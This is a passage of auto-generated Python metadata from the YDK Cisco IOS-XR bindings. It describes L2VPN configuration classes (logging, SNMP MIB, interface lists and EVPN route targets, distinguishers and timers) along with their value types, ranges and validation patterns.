'bgp-signaling',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.AutoDiscovery' : {
'meta_info' : _MetaInfoClass('L2Vpn.AutoDiscovery',
False,
[
_MetaInfoClassMember('bgp-signaling', REFERENCE_CLASS, 'BgpSignaling' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.AutoDiscovery.BgpSignaling',
[], [],
''' Global bgp signaling attributes
''',
'bgp_signaling',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'auto-discovery',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Utility.Logging' : {
'meta_info' : _MetaInfoClass('L2Vpn.Utility.Logging',
False,
[
_MetaInfoClassMember('bridge-domain-state-change', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Bridge Domain state change logging
''',
'bridge_domain_state_change',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('nsr-state-change', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Non Stop Routing state change logging
''',
'nsr_state_change',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-state-change', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable pseudowire state change logging
''',
'pseudowire_state_change',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pwhe-replication-state-change', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable PW-HE Replication state change logging
''',
'pwhe_replication_state_change',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vfi', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable VFI state change logging
''',
'vfi',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'logging',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Utility' : {
'meta_info' : _MetaInfoClass('L2Vpn.Utility',
False,
[
_MetaInfoClassMember('logging', REFERENCE_CLASS, 'Logging' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Utility.Logging',
[], [],
''' L2VPN logging utility
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'utility',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Snmp.Mib.MibInterface.Format' : {
'meta_info' : _MetaInfoClass('L2Vpn.Snmp.Mib.MibInterface.Format',
False,
[
_MetaInfoClassMember('external-interface-format', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Set MIB interface name output in slash
format (/)
''',
'external_interface_format',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'format',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Snmp.Mib.MibInterface' : {
'meta_info' : _MetaInfoClass('L2Vpn.Snmp.Mib.MibInterface',
False,
[
_MetaInfoClassMember('format', REFERENCE_CLASS, 'Format' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Snmp.Mib.MibInterface.Format',
[], [],
''' MIB interface name output format
''',
'format',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mib-interface',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Snmp.Mib.MibPseudowire' : {
'meta_info' : _MetaInfoClass('L2Vpn.Snmp.Mib.MibPseudowire',
False,
[
_MetaInfoClassMember('statistics', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable pseudowire statistics in MIB output
''',
'statistics',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mib-pseudowire',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Snmp.Mib' : {
'meta_info' : _MetaInfoClass('L2Vpn.Snmp.Mib',
False,
[
_MetaInfoClassMember('mib-interface', REFERENCE_CLASS, 'MibInterface' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Snmp.Mib.MibInterface',
[], [],
''' Interface related configuration for MIB
''',
'mib_interface',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mib-pseudowire', REFERENCE_CLASS, 'MibPseudowire' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Snmp.Mib.MibPseudowire',
[], [],
''' Pseudowire related configuration for MIB
''',
'mib_pseudowire',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mib',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Snmp' : {
'meta_info' : _MetaInfoClass('L2Vpn.Snmp',
False,
[
_MetaInfoClassMember('mib', REFERENCE_CLASS, 'Mib' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Snmp.Mib',
[], [],
''' MIB related configuration
''',
'mib',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'snmp',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn' : {
'meta_info' : _MetaInfoClass('L2Vpn',
False,
[
_MetaInfoClassMember('auto-discovery', REFERENCE_CLASS, 'AutoDiscovery' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.AutoDiscovery',
[], [],
''' Global auto-discovery attributes
''',
'auto_discovery',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('capability', REFERENCE_ENUM_CLASS, 'L2VpnCapabilityModeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnCapabilityModeEnum',
[], [],
''' L2VPN Capability Mode
''',
'capability',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('database', REFERENCE_CLASS, 'Database' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database',
[], [],
''' L2VPN databases
''',
'database',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable L2VPN feature
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2vpn-router-id', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Global L2VPN Router ID
''',
'l2vpn_router_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('load-balance', REFERENCE_ENUM_CLASS, 'LoadBalanceEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'LoadBalanceEnum',
[], [],
''' Enable flow load balancing on l2vpn bridges
''',
'load_balance',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mspw-description', ATTRIBUTE, 'str' , None, None,
[(0, 64)], [],
''' MS-PW global description
''',
'mspw_description',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mtu-mismatch-ignore', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Ignore MTU Mismatch for XCs
''',
'mtu_mismatch_ignore',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('neighbor', REFERENCE_CLASS, 'Neighbor' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Neighbor',
[], [],
''' L2VPN neighbor submode
''',
'neighbor',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('nsr', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Non-Stop Routing
''',
'nsr',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb', REFERENCE_CLASS, 'Pbb' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Pbb',
[], [],
''' L2VPN PBB Global
''',
'pbb',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pw-grouping', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable PW grouping
''',
'pw_grouping',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pw-routing', REFERENCE_CLASS, 'PwRouting' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.PwRouting',
[], [],
''' Pseudowire-routing attributes
''',
'pw_routing',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pw-status-disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable PW status
''',
'pw_status_disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pwoam-refresh', ATTRIBUTE, 'int' , None, None,
[('1', '4095')], [],
''' Configure PW OAM refresh interval
''',
'pwoam_refresh',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('snmp', REFERENCE_CLASS, 'Snmp' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Snmp',
[], [],
''' SNMP related configuration
''',
'snmp',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('tcn-propagation', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Topology change notification propagation
''',
'tcn_propagation',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('utility', REFERENCE_CLASS, 'Utility' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Utility',
[], [],
''' L2VPN utilities
''',
'utility',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2vpn',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'GenericInterfaceLists.GenericInterface.Interfaces.Interface' : {
'meta_info' : _MetaInfoClass('GenericInterfaceLists.GenericInterface.Interfaces.Interface',
False,
[
_MetaInfoClassMember('interface-name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Name of the interface
''',
'interface_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable interface
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interface',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'GenericInterfaceLists.GenericInterface.Interfaces' : {
'meta_info' : _MetaInfoClass('GenericInterfaceLists.GenericInterface.Interfaces',
False,
[
_MetaInfoClassMember('interface', REFERENCE_LIST, 'Interface' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'GenericInterfaceLists.GenericInterface.Interfaces.Interface',
[], [],
''' Interface
''',
'interface',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interfaces',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'GenericInterfaceLists.GenericInterface' : {
'meta_info' : _MetaInfoClass('GenericInterfaceLists.GenericInterface',
False,
[
_MetaInfoClassMember('generic-interface-list-name', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Name of the interface list
''',
'generic_interface_list_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable interface list
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interfaces', REFERENCE_CLASS, 'Interfaces' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'GenericInterfaceLists.GenericInterface.Interfaces',
[], [],
''' Interface table
''',
'interfaces',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'generic-interface',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'GenericInterfaceLists' : {
'meta_info' : _MetaInfoClass('GenericInterfaceLists',
False,
[
_MetaInfoClassMember('generic-interface', REFERENCE_LIST, 'GenericInterface' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'GenericInterfaceLists.GenericInterface',
[], [],
''' Bridge group
''',
'generic_interface',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'generic-interface-lists',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnTimers' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnTimers',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable EVPN timers
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-peering', ATTRIBUTE, 'int' , None, None,
[('0', '300')], [],
''' Global Peering timer
''',
'evpn_peering',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-recovery', ATTRIBUTE, 'int' , None, None,
[('20', '3600')], [],
''' Global Recovery timer
''',
'evpn_recovery',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-timers',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.Evpnevis.Evpnevi.EviLoadBalancing' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.Evpnevis.Evpnevi.EviLoadBalancing',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable EVI Loadbalancing
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evi-flow-label', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Flow Label based load balancing
''',
'evi_flow_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evi-load-balancing',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget.TwoByteAsOrFourByteAs' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget.TwoByteAsOrFourByteAs',
False,
[
_MetaInfoClassMember('as', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Two byte or 4 byte AS number
''',
'as_',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('as-index', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' AS:nn (hex or decimal format)
''',
'as_index',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'two-byte-as-or-four-byte-as',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget.Ipv4Address' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget.Ipv4Address',
False,
[
_MetaInfoClassMember('addr-index', ATTRIBUTE, 'int' , None, None,
[('0', '65535')], [],
''' Addr index
''',
'addr_index',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' IPV4 address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'ipv4-address',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget',
False,
[
_MetaInfoClassMember('format', REFERENCE_ENUM_CLASS, 'BgpRouteTargetFormatEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteTargetFormatEnum',
[], [],
''' Format of the route target
''',
'format',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('role', REFERENCE_ENUM_CLASS, 'BgpRouteTargetRoleEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteTargetRoleEnum',
[], [],
''' Role of the router target type
''',
'role',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('stitching', REFERENCE_ENUM_CLASS, 'BgpRouteTargetEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteTargetEnum',
[], [],
''' whether RT is Stitching RT
''',
'stitching',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('ipv4-address', REFERENCE_LIST, 'Ipv4Address' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget.Ipv4Address',
[], [],
''' ipv4 address
''',
'ipv4_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('two-byte-as-or-four-byte-as', REFERENCE_LIST, 'TwoByteAsOrFourByteAs' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget.TwoByteAsOrFourByteAs',
[], [],
''' two byte as or four byte as
''',
'two_byte_as_or_four_byte_as',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-route-target',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets',
False,
[
_MetaInfoClassMember('evpn-route-target', REFERENCE_LIST, 'EvpnRouteTarget' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget',
[], [],
''' Name of the Route Target
''',
'evpn_route_target',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-route-targets',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteDistinguisher' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteDistinguisher',
False,
[
_MetaInfoClassMember('addr-index', ATTRIBUTE, 'int' , None, None,
[('0', '65535')], [],
''' Addr index
''',
'addr_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' IPV4 address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Two byte or 4 byte AS number
''',
'as_',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as-index', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' AS:nn (hex or decimal format)
''',
'as_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type', REFERENCE_ENUM_CLASS, 'BgpRouteDistinguisherEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteDistinguisherEnum',
[], [],
''' Router Distinguisher Type
''',
'type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-route-distinguisher',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Autodiscovery BGP
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-route-distinguisher', REFERENCE_CLASS, 'EvpnRouteDistinguisher' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteDistinguisher',
[], [],
''' Route Distinguisher
''',
'evpn_route_distinguisher',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-route-targets', REFERENCE_CLASS, 'EvpnRouteTargets' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets',
[], [],
''' Route Target
''',
'evpn_route_targets',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('table-policy', ATTRIBUTE, 'str' , None, None,
[], [],
''' Table Policy for installation of forwarding
data to L2FIB
''',
'table_policy',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpnevibgp-auto-discovery',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.Evpnevis.Evpnevi' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.Evpnevis.Evpnevi',
False,
[
_MetaInfoClassMember('eviid', ATTRIBUTE, 'int' , None, None,
[('1', '65534')], [],
''' EVI ID
''',
'eviid',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('evi-load-balancing', REFERENCE_CLASS, 'EviLoadBalancing' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.Evpnevis.Evpnevi.EviLoadBalancing',
[], [],
''' Enter EVI Loadbalancing configuration submode
''',
'evi_load_balancing',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-evi-cw-disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' CW disable for EVPN EVI
''',
'evpn_evi_cw_disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpnevi-description', ATTRIBUTE, 'str' , None, None,
[(0, 64)], [],
''' Description for EVPN EVI
''',
'evpnevi_description',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpnevibgp-auto-discovery', REFERENCE_CLASS, 'EvpnevibgpAutoDiscovery' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery',
[], [],
''' Enable Autodiscovery BGP in EVPN EVI
''',
'evpnevibgp_auto_discovery',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpnevi',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.Evpnevis' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.Evpnevis',
False,
[
_MetaInfoClassMember('evpnevi', REFERENCE_LIST, 'Evpnevi' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.Evpnevis.Evpnevi',
[], [],
''' Enter EVPN EVI configuration submode
''',
'evpnevi',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpnevis',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnLoadBalancing' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnLoadBalancing',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable EVPN Loadbalancing
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-flow-label', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Flow Label based load balancing
''',
'evpn_flow_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-load-balancing',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnbgpAutoDiscovery.EvpnRouteDistinguisher' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnbgpAutoDiscovery.EvpnRouteDistinguisher',
False,
[
_MetaInfoClassMember('addr-index', ATTRIBUTE, 'int' , None, None,
[('0', '65535')], [],
''' Addr index
''',
'addr_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' IPV4 address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Two byte or 4 byte AS number
''',
'as_',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as-index', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' AS:nn (hex or decimal format)
''',
